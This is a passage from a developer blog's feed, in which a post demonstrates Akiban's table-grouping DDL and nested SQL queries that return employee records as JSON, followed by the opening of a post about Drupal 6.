   <content type="html">&lt;p&gt;I came across an interesting article from Iggy Fernandez in the NoCOUG journal &lt;a href='http://www.nocoug.org/Journal/NoCOUG_Journal_201205.pdf'&gt;this month&lt;/a&gt; that prompted me to write a short little post showing a little of what we are working on at Akiban. Iggy also has a &lt;a href='http://iggyfernandez.wordpress.com/2012/04/07/relational-joins-are-expensive-by-definition-not/'&gt;blog post&lt;/a&gt; that is pretty similar to the article.&lt;/p&gt;

&lt;p&gt;We are big fans of the relational model and one thing that I loved about Iggy&amp;#8217;s article was the re-iteration of the fact that Codd never dictated how data should be stored. Hence, at Akiban we are working on a new relational database that stores data in a different manner that we refer to as &lt;a href='http://www.akiban.com/table-grouping'&gt;table grouping&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;In this post, I wanted to briefly show how we could group the schema Iggy used in his article and how that data can be retrieved. Below I show the DDL for the tables as we would create them in Akiban. You will notice the one addition in our DDL is the specification of a grouping foreign key. The DDL below creates a single table group with the &lt;code&gt;employees&lt;/code&gt; table as the root and all other tables as children.&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;create table employees 
&lt;span class='o'&gt;(&lt;/span&gt;
  emp_no int primary key not null,
  name varchar&lt;span class='o'&gt;(&lt;/span&gt;16&lt;span class='o'&gt;)&lt;/span&gt;,
  birth_date date
&lt;span class='o'&gt;)&lt;/span&gt;;

create table job_history 
&lt;span class='o'&gt;(&lt;/span&gt;
  emp_no int not null,
 job_date date not null,
 title varchar&lt;span class='o'&gt;(&lt;/span&gt;16&lt;span class='o'&gt;)&lt;/span&gt;,
 grouping foreign key &lt;span class='o'&gt;(&lt;/span&gt;emp_no&lt;span class='o'&gt;)&lt;/span&gt; references employees
&lt;span class='o'&gt;)&lt;/span&gt;;

create table salary_history 
&lt;span class='o'&gt;(&lt;/span&gt;
  emp_no int not null,
  job_date date not null,
  salary_date date not null,
  salary decimal,
  grouping foreign key &lt;span class='o'&gt;(&lt;/span&gt;emp_no&lt;span class='o'&gt;)&lt;/span&gt; references employees
&lt;span class='o'&gt;)&lt;/span&gt;;

create table children 
&lt;span class='o'&gt;(&lt;/span&gt;
  emp_no int not null,
  child_name varchar&lt;span class='o'&gt;(&lt;/span&gt;16&lt;span class='o'&gt;)&lt;/span&gt; not null,
  birth_date date,
  grouping foreign key &lt;span class='o'&gt;(&lt;/span&gt;emp_no&lt;span class='o'&gt;)&lt;/span&gt; references employees
&lt;span class='o'&gt;)&lt;/span&gt;;

insert into employees values &lt;span class='o'&gt;(&lt;/span&gt;1, &lt;span class='s1'&gt;&amp;#39;IGNATIES&amp;#39;&lt;/span&gt;, &lt;span class='s1'&gt;&amp;#39;1970-01-01&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;)&lt;/span&gt;;

insert into children values &lt;span class='o'&gt;(&lt;/span&gt;1, &lt;span class='s1'&gt;&amp;#39;INIGA&amp;#39;&lt;/span&gt;, &lt;span class='s1'&gt;&amp;#39;2001-01-01&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;)&lt;/span&gt;;
insert into children values &lt;span class='o'&gt;(&lt;/span&gt;1, &lt;span class='s1'&gt;&amp;#39;INIGO&amp;#39;&lt;/span&gt;, &lt;span class='s1'&gt;&amp;#39;2001-01-01&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;)&lt;/span&gt;;

insert into job_history values &lt;span class='o'&gt;(&lt;/span&gt;1, &lt;span class='s1'&gt;&amp;#39;1991-01-01&amp;#39;&lt;/span&gt;, &lt;span class='s1'&gt;&amp;#39;PROGRAMMER&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;)&lt;/span&gt;;
insert into job_history values &lt;span class='o'&gt;(&lt;/span&gt;1, &lt;span class='s1'&gt;&amp;#39;1992-01-01&amp;#39;&lt;/span&gt;, &lt;span class='s1'&gt;&amp;#39;DATABASE ADMIN&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;)&lt;/span&gt;;

insert into salary_history values &lt;span class='o'&gt;(&lt;/span&gt;1, &lt;span class='s1'&gt;&amp;#39;1991-01-01&amp;#39;&lt;/span&gt;, &lt;span class='s1'&gt;&amp;#39;1991-01-02&amp;#39;&lt;/span&gt;, 1000&lt;span class='o'&gt;)&lt;/span&gt;;
insert into salary_history values &lt;span class='o'&gt;(&lt;/span&gt;1, &lt;span class='s1'&gt;&amp;#39;1991-01-01&amp;#39;&lt;/span&gt;, &lt;span class='s1'&gt;&amp;#39;1991-01-03&amp;#39;&lt;/span&gt;, 1000&lt;span class='o'&gt;)&lt;/span&gt;;
insert into salary_history values &lt;span class='o'&gt;(&lt;/span&gt;1, &lt;span class='s1'&gt;&amp;#39;1992-01-01&amp;#39;&lt;/span&gt;, &lt;span class='s1'&gt;&amp;#39;1992-01-02&amp;#39;&lt;/span&gt;, 2000&lt;span class='o'&gt;)&lt;/span&gt;;
insert into salary_history values &lt;span class='o'&gt;(&lt;/span&gt;1, &lt;span class='s1'&gt;&amp;#39;1992-01-01&amp;#39;&lt;/span&gt;, &lt;span class='s1'&gt;&amp;#39;1992-01-03&amp;#39;&lt;/span&gt;, 2000&lt;span class='o'&gt;)&lt;/span&gt;;

&lt;span class='nb'&gt;test&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&amp;gt; &lt;span class='k'&gt;select&lt;/span&gt; * from employees;
 emp_no |   name   | birth_date 
--------+----------+------------
      1 | IGNATIES | 1970-01-01
&lt;span class='o'&gt;(&lt;/span&gt;1 row&lt;span class='o'&gt;)&lt;/span&gt;

Time: 3.529 ms
&lt;span class='nb'&gt;test&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&amp;gt; &lt;span class='k'&gt;select&lt;/span&gt; * from children;
 emp_no | child_name | birth_date 
--------+------------+------------
      1 | INIGA      | 2001-01-01
      1 | INIGO      | 2001-01-01
&lt;span class='o'&gt;(&lt;/span&gt;2 rows&lt;span class='o'&gt;)&lt;/span&gt;

Time: 4.058 ms
&lt;span class='nb'&gt;test&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&amp;gt; &lt;span class='k'&gt;select&lt;/span&gt; * from job_history;
 emp_no |  job_date  |     title      
--------+------------+----------------
      1 | 1991-01-01 | PROGRAMMER
      1 | 1992-01-01 | DATABASE ADMIN
&lt;span class='o'&gt;(&lt;/span&gt;2 rows&lt;span class='o'&gt;)&lt;/span&gt;

Time: 3.954 ms
&lt;span class='nb'&gt;test&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&amp;gt; &lt;span class='k'&gt;select&lt;/span&gt; * from salary_history;
 emp_no |  job_date  | salary_date | salary 
--------+------------+-------------+--------
      1 | 1991-01-01 | 1991-01-02  |   1000
      1 | 1991-01-01 | 1991-01-03  |   1000
      1 | 1992-01-01 | 1992-01-02  |   2000
      1 | 1992-01-01 | 1992-01-03  |   2000
&lt;span class='o'&gt;(&lt;/span&gt;4 rows&lt;span class='o'&gt;)&lt;/span&gt;

Time: 3.868 ms
&lt;span class='nb'&gt;test&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Ok, now we have a simple dataset with 1 employee. In Akiban, all data for that 1 employee is essentially stored pre-joined. I explained previously how we accomplish this in a &lt;a href='http://www.akiban.com/blog/2011/09/22/introducing-hkey'&gt;post&lt;/a&gt; on the company blog so I won&amp;#8217;t go into detail here.&lt;/p&gt;

&lt;p&gt;Now what if I wanted to get all employee information for this person in 1 go? In Iggy&amp;#8217;s article, Oracle&amp;#8217;s multi-table clustering functionality is used to make sure doing that is efficient and then SQL/XML is used to query it and construct a single XML document with all the employees information.&lt;/p&gt;

&lt;p&gt;Well, in Akiban, we&amp;#8217;ve implemented support for &lt;a href='http://www.cs.utexas.edu/ftp/techreports/tr85-19.pdf'&gt;nested SQL&lt;/a&gt;. This allows us to return data as objects instead of returning data in tabular form. We decided to format the objects we return in JSON for our first implementation of this functionality. Now if I want to get all information for employee 1 in a single query with a nested result in JSON format, I simply need to enable that mode in Akiban and issue a query like the one shown below.&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;&lt;span class='k'&gt;select &lt;/span&gt;
&lt;span class='k'&gt;  &lt;/span&gt;employees.*,
  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='k'&gt;select &lt;/span&gt;children.* from children where employees.emp_no &lt;span class='o'&gt;=&lt;/span&gt; children.emp_no&lt;span class='o'&gt;)&lt;/span&gt;,                       
  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='k'&gt;select &lt;/span&gt;job_history.* from job_history where employees.emp_no &lt;span class='o'&gt;=&lt;/span&gt; job_history.emp_no&lt;span class='o'&gt;)&lt;/span&gt;,                
  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='k'&gt;select &lt;/span&gt;salary_history.* from salary_history where employees.emp_no &lt;span class='o'&gt;=&lt;/span&gt; salary_history.emp_no&lt;span class='o'&gt;)&lt;/span&gt; 
from 
  employees
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Ok, now to enable nested result sets and fire the query off. This is exactly what the interaction with our system will look like.&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;&lt;span class='nb'&gt;test&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&amp;gt; &lt;span class='nb'&gt;set &lt;/span&gt;&lt;span class='nv'&gt;OutputFormat&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;json&amp;#39;&lt;/span&gt;;
SET OutputFormat
Time: 1.290 ms
&lt;span class='nb'&gt;test&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&amp;gt; &lt;span class='k'&gt;select &lt;/span&gt;
&lt;span class='nb'&gt;test&lt;/span&gt;-&amp;gt;   employees.*,
&lt;span class='nb'&gt;test&lt;/span&gt;-&amp;gt;   &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='k'&gt;select &lt;/span&gt;children.* from children where employees.emp_no &lt;span class='o'&gt;=&lt;/span&gt; children.emp_no&lt;span class='o'&gt;)&lt;/span&gt;,                       
&lt;span class='nb'&gt;test&lt;/span&gt;-&amp;gt;   &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='k'&gt;select &lt;/span&gt;job_history.* from job_history where employees.emp_no &lt;span class='o'&gt;=&lt;/span&gt; job_history.emp_no&lt;span class='o'&gt;)&lt;/span&gt;,                
&lt;span class='nb'&gt;test&lt;/span&gt;-&amp;gt;   &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='k'&gt;select &lt;/span&gt;salary_history.* from salary_history where employees.emp_no &lt;span class='o'&gt;=&lt;/span&gt; salary_history.emp_no&lt;span class='o'&gt;)&lt;/span&gt; 
&lt;span class='nb'&gt;test&lt;/span&gt;-&amp;gt; from 
&lt;span class='nb'&gt;test&lt;/span&gt;-&amp;gt;   employees;
                                                                                                                                                                                                                                                                                                                                         JSON                                                                                                                                                                                                                                                                                                                                          
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 &lt;span class='o'&gt;{&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;:1,&lt;span class='s2'&gt;&amp;quot;name&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;IGNATIES&amp;quot;&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;birth_date&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;1970-01-01&amp;quot;&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;_SQL_COL_1&amp;quot;&lt;/span&gt;:&lt;span class='o'&gt;[{&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;:1,&lt;span class='s2'&gt;&amp;quot;child_name&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;INIGA&amp;quot;&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;birth_date&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;2001-01-01&amp;quot;&lt;/span&gt;&lt;span class='o'&gt;}&lt;/span&gt;,&lt;span class='o'&gt;{&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;:1,&lt;span class='s2'&gt;&amp;quot;child_name&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;INIGO&amp;quot;&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;birth_date&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;2001-01-01&amp;quot;&lt;/span&gt;&lt;span class='o'&gt;}]&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;_SQL_COL_2&amp;quot;&lt;/span&gt;:&lt;span class='o'&gt;[{&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;:1,&lt;span class='s2'&gt;&amp;quot;job_date&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;1991-01-01&amp;quot;&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;title&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;PROGRAMMER&amp;quot;&lt;/span&gt;&lt;span class='o'&gt;}&lt;/span&gt;,&lt;span class='o'&gt;{&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;:1,&lt;span class='s2'&gt;&amp;quot;job_date&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;1992-01-01&amp;quot;&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;title&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;DATABASE ADMIN&amp;quot;&lt;/span&gt;&lt;span class='o'&gt;}]&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;_SQL_COL_3&amp;quot;&lt;/span&gt;:&lt;span class='o'&gt;[{&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;:1,&lt;span class='s2'&gt;&amp;quot;job_date&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;1991-01-01&amp;quot;&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;salary_date&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;1991-01-02&amp;quot;&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;salary&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;1000&amp;quot;&lt;/span&gt;&lt;span class='o'&gt;}&lt;/span&gt;,&lt;span class='o'&gt;{&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;:1,&lt;span class='s2'&gt;&amp;quot;job_date&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;1991-01-01&amp;quot;&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;salary_date&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;1991-01-03&amp;quot;&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;salary&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;1000&amp;quot;&lt;/span&gt;&lt;span class='o'&gt;}&lt;/span&gt;,&lt;span class='o'&gt;{&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;:1,&lt;span class='s2'&gt;&amp;quot;job_date&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;1992-01-01&amp;quot;&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;salary_date&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;1992-01-02&amp;quot;&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;salary&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;2000&amp;quot;&lt;/span&gt;&lt;span class='o'&gt;}&lt;/span&gt;,&lt;span class='o'&gt;{&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;:1,&lt;span class='s2'&gt;&amp;quot;job_date&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;1992-01-01&amp;quot;&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;salary_date&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;1992-01-03&amp;quot;&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;salary&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;2000&amp;quot;&lt;/span&gt;&lt;span class='o'&gt;}]}&lt;/span&gt;
&lt;span class='o'&gt;(&lt;/span&gt;1 row&lt;span class='o'&gt;)&lt;/span&gt;

Time: 12.230 ms
&lt;span class='nb'&gt;test&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If you scroll to the right above, you will see the nested result set with all of the information for employee 1. Also notice that we have an easy way to enable/disable nested result set functionality. Setting this format to &amp;#8216;table&amp;#8217; results in tabular output. The result set above nicely formatted is shown next.&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;&lt;span class='o'&gt;{&lt;/span&gt;
    &lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;: 1,
    &lt;span class='s2'&gt;&amp;quot;name&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;IGNATIES&amp;quot;&lt;/span&gt;,
    &lt;span class='s2'&gt;&amp;quot;birth_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1970-01-01&amp;quot;&lt;/span&gt;,
    &lt;span class='s2'&gt;&amp;quot;_SQL_COL_1&amp;quot;&lt;/span&gt;: &lt;span class='o'&gt;[&lt;/span&gt;
        &lt;span class='o'&gt;{&lt;/span&gt;
            &lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;: 1,
            &lt;span class='s2'&gt;&amp;quot;child_name&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;INIGA&amp;quot;&lt;/span&gt;,
            &lt;span class='s2'&gt;&amp;quot;birth_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;2001-01-01&amp;quot;&lt;/span&gt;
        &lt;span class='o'&gt;}&lt;/span&gt;,
        &lt;span class='o'&gt;{&lt;/span&gt;
            &lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;: 1,
            &lt;span class='s2'&gt;&amp;quot;child_name&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;INIGO&amp;quot;&lt;/span&gt;,
            &lt;span class='s2'&gt;&amp;quot;birth_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;2001-01-01&amp;quot;&lt;/span&gt;
        &lt;span class='o'&gt;}&lt;/span&gt;
    &lt;span class='o'&gt;]&lt;/span&gt;,
    &lt;span class='s2'&gt;&amp;quot;_SQL_COL_2&amp;quot;&lt;/span&gt;: &lt;span class='o'&gt;[&lt;/span&gt;
        &lt;span class='o'&gt;{&lt;/span&gt;
            &lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;: 1,
            &lt;span class='s2'&gt;&amp;quot;job_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1991-01-01&amp;quot;&lt;/span&gt;,
            &lt;span class='s2'&gt;&amp;quot;title&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;PROGRAMMER&amp;quot;&lt;/span&gt;
        &lt;span class='o'&gt;}&lt;/span&gt;,
        &lt;span class='o'&gt;{&lt;/span&gt;
            &lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;: 1,
            &lt;span class='s2'&gt;&amp;quot;job_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1992-01-01&amp;quot;&lt;/span&gt;,
            &lt;span class='s2'&gt;&amp;quot;title&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;DATABASE ADMIN&amp;quot;&lt;/span&gt;
        &lt;span class='o'&gt;}&lt;/span&gt;
    &lt;span class='o'&gt;]&lt;/span&gt;,
    &lt;span class='s2'&gt;&amp;quot;_SQL_COL_3&amp;quot;&lt;/span&gt;: &lt;span class='o'&gt;[&lt;/span&gt;
        &lt;span class='o'&gt;{&lt;/span&gt;
            &lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;: 1,
            &lt;span class='s2'&gt;&amp;quot;job_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1991-01-01&amp;quot;&lt;/span&gt;,
            &lt;span class='s2'&gt;&amp;quot;salary_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1991-01-02&amp;quot;&lt;/span&gt;,
            &lt;span class='s2'&gt;&amp;quot;salary&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1000&amp;quot;&lt;/span&gt;
        &lt;span class='o'&gt;}&lt;/span&gt;,
        &lt;span class='o'&gt;{&lt;/span&gt;
            &lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;: 1,
            &lt;span class='s2'&gt;&amp;quot;job_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1991-01-01&amp;quot;&lt;/span&gt;,
            &lt;span class='s2'&gt;&amp;quot;salary_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1991-01-03&amp;quot;&lt;/span&gt;,
            &lt;span class='s2'&gt;&amp;quot;salary&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1000&amp;quot;&lt;/span&gt;
        &lt;span class='o'&gt;}&lt;/span&gt;,
        &lt;span class='o'&gt;{&lt;/span&gt;
            &lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;: 1,
            &lt;span class='s2'&gt;&amp;quot;job_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1992-01-01&amp;quot;&lt;/span&gt;,
            &lt;span class='s2'&gt;&amp;quot;salary_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1992-01-02&amp;quot;&lt;/span&gt;,
            &lt;span class='s2'&gt;&amp;quot;salary&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;2000&amp;quot;&lt;/span&gt;
        &lt;span class='o'&gt;}&lt;/span&gt;,
        &lt;span class='o'&gt;{&lt;/span&gt;
            &lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;: 1,
            &lt;span class='s2'&gt;&amp;quot;job_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1992-01-01&amp;quot;&lt;/span&gt;,
            &lt;span class='s2'&gt;&amp;quot;salary_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1992-01-03&amp;quot;&lt;/span&gt;,
            &lt;span class='s2'&gt;&amp;quot;salary&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;2000&amp;quot;&lt;/span&gt;
        &lt;span class='o'&gt;}&lt;/span&gt;
    &lt;span class='o'&gt;]&lt;/span&gt;
&lt;span class='o'&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now there is no reason we could not decide to write an XML outputter in the future. JSON is what we have gone with at the moment because we all like JSON here and we have a few people who are not such big fans of XML.&lt;/p&gt;

&lt;p&gt;Since this is nested SQL, I can just select what I want and filter the result set using predicates. Lets say I only want birth dates of children named &amp;#8216;INIGA&amp;#8217; and salary history and job information for &amp;#8216;DATABASE ADMIN&amp;#8217; role. I can also give aliases to anything in my &lt;code&gt;SELECT&lt;/code&gt; clause.&lt;/p&gt;

&lt;p&gt;I could write a query like the following:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;&lt;span class='k'&gt;select &lt;/span&gt;
&lt;span class='k'&gt;  &lt;/span&gt;employees.*,
  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='k'&gt;select &lt;/span&gt;children.birth_date from children where employees.emp_no &lt;span class='o'&gt;=&lt;/span&gt; children.emp_no and &lt;span class='nv'&gt;child_name&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;INIGA&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;)&lt;/span&gt; as children, 
  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='k'&gt;select &lt;/span&gt;job_history.job_date from job_history where employees.emp_no &lt;span class='o'&gt;=&lt;/span&gt; job_history.emp_no and &lt;span class='nv'&gt;title&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;DATABASE ADMIN&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;)&lt;/span&gt; as job, 
  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='k'&gt;select &lt;/span&gt;salary_history.salary from salary_history where employees.emp_no &lt;span class='o'&gt;=&lt;/span&gt; salary_history.emp_no and &lt;span class='nv'&gt;job_date&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;1992-01-01&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;)&lt;/span&gt; as salary
from 
  employees
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The above query would return a result set like (after formatting):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;&lt;span class='o'&gt;{&lt;/span&gt;
    &lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;: 1,
    &lt;span class='s2'&gt;&amp;quot;name&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;IGNATIES&amp;quot;&lt;/span&gt;,
    &lt;span class='s2'&gt;&amp;quot;birth_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1970-01-01&amp;quot;&lt;/span&gt;,
    &lt;span class='s2'&gt;&amp;quot;children&amp;quot;&lt;/span&gt;: &lt;span class='o'&gt;[&lt;/span&gt;
        &lt;span class='o'&gt;{&lt;/span&gt;
            &lt;span class='s2'&gt;&amp;quot;birth_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;2001-01-01&amp;quot;&lt;/span&gt;
        &lt;span class='o'&gt;}&lt;/span&gt;
    &lt;span class='o'&gt;]&lt;/span&gt;,
    &lt;span class='s2'&gt;&amp;quot;job&amp;quot;&lt;/span&gt;: &lt;span class='o'&gt;[&lt;/span&gt;
        &lt;span class='o'&gt;{&lt;/span&gt;
            &lt;span class='s2'&gt;&amp;quot;job_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1992-01-01&amp;quot;&lt;/span&gt;
        &lt;span class='o'&gt;}&lt;/span&gt;
    &lt;span class='o'&gt;]&lt;/span&gt;,
    &lt;span class='s2'&gt;&amp;quot;salary&amp;quot;&lt;/span&gt;: &lt;span class='o'&gt;[&lt;/span&gt;
        &lt;span class='o'&gt;{&lt;/span&gt;
            &lt;span class='s2'&gt;&amp;quot;salary&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;2000&amp;quot;&lt;/span&gt;
        &lt;span class='o'&gt;}&lt;/span&gt;,
        &lt;span class='o'&gt;{&lt;/span&gt;
            &lt;span class='s2'&gt;&amp;quot;salary&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;2000&amp;quot;&lt;/span&gt;
        &lt;span class='o'&gt;}&lt;/span&gt;
    &lt;span class='o'&gt;]&lt;/span&gt;
&lt;span class='o'&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Thats all I wanted to touch on in this post but I aim to write a different post comparing table-grouping with Oracle multi-table clusters in the future. However, we do have a short piece of text discussing the &lt;a href='http://akiban.zendesk.com/entries/20779441-how-does-table-grouping-compare-to-oracle-cluster-tables'&gt;difference&lt;/a&gt; on our Zendesk portal.&lt;/p&gt;

&lt;p&gt;Our nested SQL &lt;a href='http://www.akiban.com/ak-docs/nested.html'&gt;quickstart guide&lt;/a&gt; also has examples of this functionality if you are interested in seeing more. In that quick-start, we use the employees sample database from MySQL.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Using Akiban Server with Drupal 6</title>
   <link href="http://posulliv.github.com/2012/05/18/drupal-6-akiban"/>
   <updated>2012-05-18T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2012/05/18/drupal-6-akiban</id>
   <content type="html">&lt;p&gt;In my &lt;a href='http://posulliv.github.com/2012/05/14/drupal-akiban.html'&gt;previous post&lt;/a&gt;, I mentioned I&amp;#8217;m working on a database driver for Drupal 7 for the Akiban Server. However, we have some clients who use Drupal 6 so I wanted to talk about how we work with those clients in this post.&lt;/p&gt;

